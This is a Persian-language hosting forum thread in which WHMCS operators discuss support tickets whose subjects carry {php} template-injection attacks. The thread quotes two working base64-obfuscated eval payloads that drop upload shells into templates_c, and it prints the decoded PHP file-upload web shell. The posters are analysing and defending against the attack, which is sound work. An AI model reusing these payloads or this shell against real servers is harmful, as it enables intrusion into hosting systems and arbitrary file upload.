سلام
یکی اومده این کد رو ازه روی سابجکت این کد چه کاری انجام میده ؟
{php}echo('bbbb');exit;{/php}
نمایش نسخه قابل چاپ
سلام
یکی اومده این کد رو ازه روی سابجکت این کد چه کاری انجام میده ؟
{php}echo('bbbb');exit;{/php}
سلام
مطمئنید نوشته درسته؟
این نبود؟
<?php echo("bbb"); exit ?>
ادامش باید دید چیه ولی من فکرمی کنم فقط bbb رو تو صفحه نشون میده البته ادامش هم مهمه شاید هم یه چیز دیگه باشه
سلام
ميخواسته تست كنه ببينه باگ روي سايتتون اگر فعال هست شل بريزه !
قبل از چک کردت تیکت ، ایمیلتون رو چک کنید
نوعی حرکت برای هک هست با آپلود شل و ...
سلام
به احتمال هکر بوده و به نظرم جزء جوجه هکرا بوده چون از روشی داره هک میکنه که راحت طرف شناسائی میکنه
به نظرم سریع موارد امنیتی درنظربگیر و انجام بده
اگر سیستم WHMCS هست میخواسته اقدام به هک کنه. بن کنید و با همین کارهایی که در فروم گفته شده سیستم رو secure کنید.
اون تگ های {php} برای قالب های WHMCS معنی دارن و به صورت <?php eval ( ؟> >؟ )؟> تفسیر میشن
آقا وقتی از بخش کنترل اسپم سابجکت رو با عبارات گفته شده بن میکنم بازهم جلوگیری نمیکنه و همون کدها توی سابجکت ارسال میشه....دلیلش چیه؟ از همونا باید اقدام کرد؟
کلیه کارهایی که در اینجا گفته شده انجام بدید
http://www.webhostingtalk.ir/f177/36031/
از بخش کنترل اسپم وارد میکنم اما بازم تیکت ها با همون کد راحت ارسا میشن...مگه نباید اججازه نده دیگه اون کد ارسال بشه؟ من حتی php وارد کردم اما نشد
شما تمام کارهایی که توی اون تاپیک هست رو انجام بدید کافیه فعلا
توی اسپم کل کد رو بزنید
عزیز منم دارم میگم کد رو کامل میزنم و به راحتی مجدد ارسال میشه...یعنی انگار کد رو فیتر نمیکنه اصلا..منم همین واسم عجیبه
من لایسنس خریدم و به آخرین ورژن آپدیت شده و هیچ کاری نمیتونن کنند :d ولی میدن بازن حالا اینو چجوری میشه دیکد کرد و کی میتونه دیکد کنه ببینیم چه کار میخواستن کنند که نتونستن :d
کد:{php}evaL(base64_decode('JGZoMiA9IGZvcGVuKCJ0ZW1wbGF0ZXNfYy9odGFjY2Vzcy5waHAiLCJ3Iik7IA0KZnB1dHMoJGZoMiwgIjw/IGV2YWwoYmFzZTY0X2RlY29kZShcIkpHUnZZM0lnUFNBa1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkT3cwS1pXTm9ieUE4UER4SVZFMU1EUW84ZEdGaWJHVStQR1p2Y20wZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdZV04wYVc5dVBTSWtjMlZzWmlJZ2JXVjBhRzlrUFNKUVQxTlVJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSm9hV1JrWlc0aUlHNWhiV1U5SW1GaklpQjJZV3gxWlQwaWRYQnNiMkZrSWo0TkNqeDBjajQ4ZEdRZ2QybGtkR2c5SWpRNElqNDhabTl1ZENCemFYcGxQU0l4SWo1WmIzVnlJRVpwYkdVNklEd3ZabTl1ZEQ0Z1BDOTBaRDROQ2p4MFpENDhhVzV3ZFhRZ2MybDZaVDBpTkRnaUlHNWhiV1U5SW1acGJHVWlJSFI1Y0dVOUltWnBiR1VpSUQ0OEwzUmtQand2ZEhJK0RRbzhkSEkrUEhSa0lIZHBaSFJvUFNJME9DSStQR1p2Ym5RZ2MybDZaVDBpTVNJK1ZYQnNiMkZrSUVScGNqb2dQQzltYjI1MFBqd3ZkR1ErUEhSa1BnMEtQR2x1Y0hWMElITnBlbVU5SWpRNElpQjJZV3gxWlQwaUpHUnZZM0l2SWlCdVlXMWxQU0p3WVhSb0lpQjBlWEJsUFNKMFpYaDBJaUErRFFvOGFXNXdkWFFnZEhsd1pUMGljM1ZpYldsMElpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwzUmtQand2Wm05eWJUNDhMM1JoWW14bFBnMEtKSFJsYm1RTkNraFVUVXc3RFFwcFppQW9hWE56WlhRb0pGOVFUMU5VV3lkd1lYUm9KMTBwS1hzTkNpUjFjR3h2WVdSbWFXeGxJRDBnSkY5UVQxTlVXeWR3WVhSb0oxMHVKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcHBaaUFvSkY5UVQxTlVXeWR3WVhSb0oxMDlQU0lpS1hza2RYQnNiMkZrWm1sc1pTQTlJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE8zME5DbWxtSUNoamIzQjVLQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25kRzF3WDI1aGJXVW5YU3dnSkhWd2JHOWhaR1pwYkdVcEtTQjdEUW9nSUNBZ1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQjBieUE2SUNSMWNHeHZZV1JtYVd4bFhHNGlPdzBLSUNBZ0lHVmphRzhnSWkwZ1UybDZaU0E2SUNJZ0xpUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmMybDZaU2RkTGlBaVhHNGlPdzBLZlNCbGJITmxJSHR3Y21sdWRDQWlSWEp5YjNJZ0p5QlZjR3h2WVdRZ1JtbHNaU0E2WEc0aU8zMTlcIikpOyA/PiIpOw0KZmNsb3NlKCRmaDIpOw=='));{/php}
نقل قول:
نوشته اصلی توسط hannah
فرم آپلود ! براي آپلود شل.کد PHP:<?php
$docr = $_SERVER['DOCUMENT_ROOT'];
echo <<<HTML
<table><form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr><td width="48"><font size="1">Your File: </font> </td>
<td><input size="48" name="file" type="file" ></td></tr>
<tr><td width="48"><font size="1">Upload Dir: </font></td><td>
<input size="48" value="$docr/" name="path" type="text" >
<input type="submit" value="Upload"></td></form></table>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "File uploaded to : $uploadfile\n";
echo "- Size : " .$_FILES['file']['size']. "\n";
} else {print "Error ' Upload File :\n";}}
میبینن آخرین نسخه هستا هک نمیشه ولی بازم تست میکنن :d آقا رضا میشه بگید چجوری دیکد میکنید ؟
obfuscate شدس ، بستگي داره تا چه حد با php آشنا باشيد تا بتونيد ديكد كنيد. اين كد دو مرحله كد شده بود ، كه كافي بود در هر مرحله جاي eval به يك متغير نسبت بديد و echo كنيد (يا روش مشابه مثل ذخيره در فايل)نقل قول:
نوشته اصلی توسط hannah
بعضي روش هاي obfuscate پيچيده تر هستند و به اين راحتي نيست ، بعضي كه شناخته شدن رو ميشه با نرم افزار de obfuscate كرد
البته بدون نیاز به دانش برنامه نویسی هم میشه!نقل قول:
نوشته اصلی توسط Rezash
Base 64 Decoder
در 2 مرحله کد بدست میاد:
کد PHP:$docr = $_SERVER['DOCUMENT_ROOT'];
echo <<<HTML
<table><form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr><td width="48"><font size="1">Your File: </font> </td>
<td><input size="48" name="file" type="file" ></td></tr>
<tr><td width="48"><font size="1">Upload Dir: </font></td><td>
<input size="48" value="$docr/" name="path" type="text" >
<input type="submit" value="Upload"></td></form></table>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "File uploaded to : $uploadfile\n";
echo "- Size : " .$_FILES['file']['size']. "\n";
} else {print "Error ' Upload File :\n";}}
اینا مارو ول نمیکنند
هک نمیتونن کنن ولی ولم نمیکنن نمیشه کاری کرد دیگه این پیام هاشون نیاد یا نتونن ارسال کنند ؟کد:{php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php}